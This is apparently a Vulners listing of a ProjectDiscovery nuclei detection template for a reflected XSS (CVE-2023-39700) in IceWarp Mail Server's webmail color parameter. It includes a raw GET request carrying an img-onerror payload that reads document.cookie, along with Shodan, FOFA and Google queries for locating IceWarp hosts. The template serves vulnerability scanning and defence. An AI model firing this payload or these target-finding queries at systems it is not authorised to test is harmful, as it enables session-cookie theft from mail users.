Lucene search
+L

IceWarp Mail Server v10.4.5 - Cross-Site Scripting

🗓️ 26 Sep 2026 02:05:07Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 69 Views

IceWarp Mail Server v10.4.5 contains a reflected Cross-Site Scripting (XSS) vulnerability in the color paramete

Related
Refs
Code
id: CVE-2023-39700

info:
  name: IceWarp Mail Server v10.4.5 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript through the color parameter in the webmail interface to steal email user session cookies and access sensitive email communications.
  remediation: |
    Update IceWarp Mail Server to a version newer than 10.4.5 that properly sanitizes the color parameter and encodes output in the webmail interface.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39700
    - https://cwe.mitre.org/data/definitions/79.html
    - https://owasp.org/www-project-top-ten/2017/A7_2017-Cross-Site_Scripting_(XSS)
    - https://owasp.org/www-project-top-ten/2017/A7_2017-Cross-Site_Scripting_%28XSS%29
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-39700
    cwe-id: CWE-79
    epss-score: 0.0148
    epss-percentile: 0.72835
    cpe: cpe:2.3:a:icewarp:mail_server:10.4.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: icewarp
    product: mail_server
    shodan-query:
      - http.title:"IceWarp Server Administration"
      - http.title:"icewarp server administration"
      - http.title:"icewarp"
      - cpe:"cpe:2.3:a:icewarp:mail_server"
    fofa-query:
      - title="icewarp server administration"
      - title="icewarp"
    google-query:
      - intitle:"icewarp server administration"
      - intitle:"icewarp"
      - powered by icewarp 10.4.4
  tags: cve,cve2023,icewarp,xss,unauth,vuln

http:
  - raw:
      - |
        GET /webmail/?color=%22%3E%3Cimg%20src=x%20onerror=confirm(document.cookie)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/html")'
          - 'contains(body, "><img src=x onerror=confirm(document.cookie)>") && contains(body, "IceWarp")'
        condition: and
# digest: 4a0a00473045022037a3e236a6778a714f4c8ed82b09fa70026abbd95589ef7a9afa5a1849bbe172022100d9e2c6ced80839867fad5660b0ee37dcc61909a26b88935457cfde3140784ed9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.16.1
EPSS0.0148
SSVC
69